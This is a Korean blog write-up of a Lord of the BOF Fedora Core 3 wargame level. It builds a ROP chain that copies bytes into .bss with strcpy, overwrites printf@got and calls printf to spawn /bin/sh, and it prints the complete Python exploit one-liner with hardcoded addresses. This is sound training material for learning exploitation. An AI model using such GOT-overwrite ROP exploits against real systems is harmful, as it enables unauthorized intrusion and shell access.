코드를 보면 로컬 -> 원격 으로 바뀐거 밖에 안되지만 왠지 모르게 전문제 익스는 안먹더군요 그래서 printf@got 를 바로 덮는거 보다 bbs를 덮고 printf@got를 bbs로 덮기로 했습니다.
bbs 는 이렇게 구하는데 저기있는 08049868 이 bbs입니다.
나머지 가젯은 알아서 찾으시고 (귀찮) 계획만 바로 세워보면
dummy[268] + strcpy@plt + ppr + bbs[0] + c0
+ strcpy@plt + ppr + bbs[1] + 07
. . . .. . .
+ strcpy@plt + ppr + printf@got + bbs
+ printf@plt + ABCD + /bin/sh
정도가 되고 익스는
(python -c 'print "A"*268 + "\x38\x84\x04\x08"+"\xf3\x84\x04\x08"+"\x68\x98\x04\x08"+"\xd9\x84\x04\x08" + "\x38\x84\x04\x08"+"\xf3\x84\x04\x08"+"\x69\x98\x04\x08"+"\x7c\x81\x04\x08" + "\x38\x84\x04\x08"+"\xf3\x84\x04\x08"+"\x6a\x98\x04\x08"+"\xb7\x84\x04\x08" + "\x38\x84\x04\x08"+"\xf3\x84\x04\x08"+"\x6b\x98\x04\x08"+"\x2c\x98\x04\x08" + "\x38\x84\x04\x08"+"\xf3\x84\x04\x08"+"\x4c\x98\x04\x08"+"\x68\x98\x04\x08" + "\x08\x84\x04\x08" +"ABCD" +"\x03\x36\x83\x00"';cat)
공격을 하면 쉘이 따지고
FC3 클리어!
는 아직 3번이,,
'Pwnable > LOB' 카테고리의 다른 글
| [LOB FC3 - level3] dark_eyes -> hell_fire (0) | 2017.06.27 |
|---|---|
| 클리어 (0) | 2017.06.27 |
| [LOB FC3 - level4] hell_fire -> evil_wizard (0) | 2017.06.12 |
| [Level13] darknight -> bugbear 다른풀이 (0) | 2017.05.19 |
| [Level1] gate -> iron_golem (0) | 2017.05.19 |